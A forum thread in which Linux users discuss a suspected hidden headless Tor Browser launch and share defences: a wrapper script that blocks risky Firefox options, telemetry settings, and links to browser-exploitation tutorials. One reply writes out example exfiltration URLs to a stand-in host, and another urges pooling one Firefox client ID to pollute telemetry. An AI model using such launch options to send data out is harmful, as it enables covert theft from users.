Beware of headless browser, Tor users affected
This topic has 7 replies, 3 voices, and was last updated Sep 1, 6:42 pm by anilkagi.

August 31, 2020 at 2:12 am #40943 (Member: ModdIt)
Yesterday, again, I had an unresponsive Tor Browser, high CPU, network traffic and disk usage.
I restarted Tor with the broom symbol to get a fresh instance. Tor closed but no browser window came up. There was a spike in disk usage, memory consumption and CPU were pretty high, network traffic also shown, far more than the normal keepalive pings to the router. I had an otherwise empty desktop.
Tor is the latest, verified, as described in the post from anilkagi. Visited sites were some that kids reported to have caused this effect; at first sight they are not weird or nasty, not in the darknet.
I have found a lot of ways to start Firefox (the browser in Tor) headless; up to now no way to block that behavior completely.
Going into the documentation I found headless Firefox can do a lot without the user's knowledge. On a high-powered computer without Conky running it might go unnoticed. Maybe taking and sending screenshots, maybe more. I have found no way to see what it is doing. In earlier cases we had 100% CPU; that seems to have changed, maybe to make the takeover less noticeable.
Conclusion for now: watch Conky. Both Chrome and Firefox can be run headless, remotely controlled, without your input.
August 31, 2020 at 9:45 pm #40960 (Anonymous)
> Maybe taking and sending screenshots, maybe more
Aye, headless (available in firefox v55+) poses a danger.
Brings a risk of silent cryptomining, data exfiltration, botnet node…
In addition to headless, it may be desirable to forbid use of several other command line options (https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options):
-start-debugger-server
-search <exfiltrated_string_here>
-url <hxxp://badsite.com/grabbit?urlencoded-exfiltrated-data-here>
-devtools <hxxp://badsite.com/grabbit?urlencoded-exfiltrated-data-here>
-kiosk (ff v71+) (cannot use Esc or F11 to exit the mode) https://support.mozilla.org/en-US/kb/firefox-enterprise-kiosk-mode
Which options to block? That’s a personal decision.
Although many folks would argue that it provides a great “convenience”, I have chosen to block the Firefox “search” command-line option on all the local machines I configure and maintain. The “Search” button (or context menu action) within certain GUI programs, if no text is currently selected/highlighted, will fall back to launching the browser and passing the content of GTK CLIPBOARD or the system clipboard as a search string. Ouch!
I recommend using a wrapper script to marshal launch of the web browser.
First, find the executable file (“torbrowser”, “firefox”, “firefox-esr”, “mybrowser”).
Make sure you have truly identified the executable (vs a symlink, or launcher script).
Example:
$ which mybrowser
/usr/bin/mybrowser
$ file /usr/bin/mybrowser
/usr/bin/mybrowser: ELF 64-bit LSB shared object, x86-64, ver…
…and rename it to (for instance) “mybrowser_real”.
Example:
sudo mv /usr/bin/mybrowser /usr/bin/mybrowser_real
Then create the wrapper script and save it as /usr/bin/mybrowser.
Example:

#!/bin/bash
# Refuse to launch the browser with elevated permissions.
if [ "$(id -u)" = "0" ]; then
    yad --text="\n\n\nPREVENTED an elevated-permissions LAUNCH \n\n\n" \
        --width=600 --center --text-align=center --button="gtk-ok" --title="!"
    exit
fi
# Inspect every argument without consuming the list, so the real browser
# still receives the full command line below.
for arg in "$@"; do
    ### leading wildcard b/c I didn't check whether ff recognizes
    ### only exact "--headless" (double-dash) vs single, or no dash
    ### ref: https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
    case "$arg" in
        *headless|*start-debugger-server|*search|*devtools|*kiosk)
            yad --text="\n\! ! !\n\nPREVENTED LAUNCH OF HEADLESS (or kiosk or...)\n" \
                --width=600 --center --text-align=center --button="gtk-ok" --title=" !"
            exit;;
    esac
done
# Hand the unmodified arguments to the renamed real executable.
mybrowser_real "$@"

“but, but recent versions of __xyz__ already won’t allow launching as root anyway”
The guarding provided by the wrapper causes no harm, and provides the benefit of a visual cue to indicate that “something” (“Help” or “Search” buttonclick within a program? A silent/malware script?) has attempted a launch.
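An alternative argument check for the wrapper, added here as an example (not skidoo's script and not part of the original post): it inspects only dash-prefixed tokens so a URL that happens to contain "headless" still opens, normalises -opt, --opt, OPT and opt=value forms before comparing them with the blocked list, and writes a log line naming the parent process so the user can later see what attempted the launch. The path /usr/bin/mybrowser_real, the wrapper name mybrowser and the log location are assumptions.

```shell
#!/bin/bash
# Added example, not skidoo's script: argv filter for the browser wrapper with a
# log line recording which process attempted the launch. Assumed names:
# /usr/bin/mybrowser_real, the wrapper installed as /usr/bin/mybrowser, the log path.
BLOCKED_OPTS="headless start-debugger-server search devtools kiosk"
LOGFILE="${BROWSER_WRAPPER_LOG:-/var/tmp/browser-wrapper.log}"

# Returns 0 when the argument list is clean, 1 when a blocked option is present.
# Only dash-prefixed tokens are examined, so a URL that merely contains the word
# "headless" is not a false positive. Leading dashes and any "=value" suffix are
# stripped and the name is lower-cased, so -headless, --HEADLESS, --kiosk=1 all match.
check_browser_args() {
    for arg in "$@"; do
        case "$arg" in
            -*) ;;          # looks like an option: inspect it
            *) continue ;;  # positional argument (URL, file): leave it alone
        esac
        opt=${arg#"${arg%%[!-]*}"}   # drop the leading dash(es)
        opt=${opt%%=*}               # drop any "=value" part
        opt=$(printf '%s' "$opt" | tr 'A-Z' 'a-z')
        for blocked in $BLOCKED_OPTS; do
            [ "$opt" = "$blocked" ] && return 1
        done
    done
    return 0
}

# Appends one line naming the parent process, so a "Search" button in some GUI
# program can be told apart from an unattended script after the fact.
log_blocked_launch() {
    parent=$(ps -o comm= -p "$PPID" 2>/dev/null || echo unknown)
    printf '%s blocked launch by pid %s (%s): %s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$PPID" "$parent" "$*" >> "$LOGFILE"
}

run_wrapper() {
    [ "$(id -u)" = "0" ] && { log_blocked_launch "(as root)" "$@"; exit 1; }
    if ! check_browser_args "$@"; then
        log_blocked_launch "$@"
        command -v yad >/dev/null 2>&1 && yad --text="PREVENTED LAUNCH WITH A BLOCKED OPTION" --button="gtk-ok"
        exit 1
    fi
    exec /usr/bin/mybrowser_real "$@"
}

# Dispatch only when running under the wrapper's name, so the functions above can
# be sourced and tested without launching anything.
case "${0##*/}" in mybrowser) run_wrapper "$@" ;; esac
```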
August 31, 2020 at 10:08 pm #40961 (Anonymous)
Related readings:
Hooking a Browser with the Browser Exploitation Framework (BeEF)
(video) Take Control of Web Browsers with BeEF [Tutorial]
(article, to accompany the above video) Take Control of Web Browsers with BeEF [Tutorial]
https://github.com/beefproject/beef
https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html

September 1, 2020 at 1:00 am #40962 (Member: ModdIt)
@skidoo, many thanks for the very informative post.
The wrapper script will be incorporated on my master stick shortly.
A couple of further reminders or primers for new users:
It is a good idea to get rid of WebRTC.
If using Firefox you may also want to remove the hidden extensions in the /browser/features folder. Depending on installation method the path can vary; in antiX MX it is /opt/firefox/browser/features.
Take a look in /home/yourusername/.mozilla/firefox/“varies”.default-release/datareporting; why, see the next lines.
The Firefox 80 from MX which I installed yesterday ignored the interface switches and sent data to Mozilla with two IDs which remained constant over several data transfers; I could trigger data sending by changing any config settings. I have set folder permissions there to write only; data sets are increasing.
If available use LAN not WLAN; even my neighbors' kids compromise wireless when they get bored. Remember even PWgen's --secure option and a maximum-length password is no protection. If you have a crappy provider router forced on you, chain it with a decent one. A hardwire raises your security somewhat.
September 1, 2020 at 9:12 am #40965 (Member: anilkagi)
Hi, @Moddit.
I have made changes concerning WebRTC and Data Reporting and some other things in the about:config page of Firefox, by setting the ‘datareporting.healthreport.uploadEnabled’ entry to false and by changing the ‘media.peerconnection.enabled’ value to false.
However, after reading your post, I checked the ~/.mozilla/firefox/Profile/datareporting/archived/ folder and found that there were two folders, one for every month I suppose, and in the August folder there are 153 text files. All are named with some random number, I suppose, but with the extension ‘.main.jsonlz4’. Only one has the extension ‘.event.jsonlz4’. Surprisingly almost all of them are empty. I checked randomly.
And there is already a folder for September, which contains 3 files named with some random number but their extensions are different. They are ‘.modules.jsonlz4’, ‘.optout.jsonlz4’ and ‘.health.jsonlz4’. These are empty too. I opened them as root. There is no data in them.
Are those files empty because of the changes to the about:config?
Is it OK to delete this ‘datareporting’ folder, wouldn’t that make Firefox unstable?
If I delete this ‘datareporting’ folder, wouldn’t it be created again?
And mysteriously all this is on the Frugal install. However, the dates on which these files in the August folder were modified are not continuous. The dates are like 2, 3, 4, and 6 to 15 continuous, and then all the dates in between are missing and start again from 24, 25, 27, 29, and no 30 and no 31. As far as I can remember I have used Firefox daily without missing any day. In between I have Remastered, but I don’t remember the dates on which I Remastered, but I don’t think I have Remastered on the 17 days that these files were created. I will now have to wait for a few days, without Remastering, and check again if any files get created and saved.
I don’t understand this behavior of firefox.
September 1, 2020 at 9:40 am #40966 (Member: anilkagi)
@Skidoo, though your first post went over my head (I didn’t understand an iota of it, and I am making further efforts), those links opened an entirely new world for me. Great many thanks.
September 1, 2020 at 12:23 pm #40970 (Member: ModdIt)
Hi anilkagi, fun, right? It’s like sitting on a hornets’ nest: you think the stings have stopped and the next wave starts.
I mostly use Pale Moon and increasingly Tor and Badwolf; the only thing missing there is a way to set up MetaGer as default. Have to compile for that I think. I failed dismally last try.
I made the data reporting folder non-writeable; Firefox still works.
Just decided to put the same client ID in all installations I can get my fingers on. That is a unique ID in the data reporting folder’s state.json; will ask my friends in Vietnam to add it to their installations and pass it on.
We cannot stop Mozilla following us around, but maybe polluting some data is not a bad idea. Similar to clicking on random or chosen misleading ads.
That game is really funny; I was even offered ladies’ plus-sized underwear on Amazon after a while, I never searched or looked at that there. Guess my profile is for a crazy fat drag queen.
{"clientID":"963111bd-efaa-493c-a37f-6a799a213cbe"} For anyone who may like to join in.
The unique systemd machine ID is not generated in antiX so that will not totally spoil the effect.
Having watched traffic I have no trust in Mozilla. Almost all of their sites are in my hosts file.
September 1, 2020 at 6:42 pm #41005 (Member: anilkagi)
Hello Moddit,
Fun? Yeah, like a scary movie, :).
I think it is like a pyramid of innumerable layers of security-malicious activity, and this is still the bottom. Rising above is a fun & learning exercise; like rising from Flyweight to Heavyweight boxing or the levels of a game. Though the malicious activity in the layer above is lesser in quantity than the layer below, it is more in quality, technically higher grade and the learning curve steeper. Rising above gets tougher and tougher for both.
So be it. That’s life. Accept it and keep moving. An endless journey. Knowing things is the key.
It is said “If you know your adversary and you know yourself, you need not fear the result of a hundred battles.”. 🙂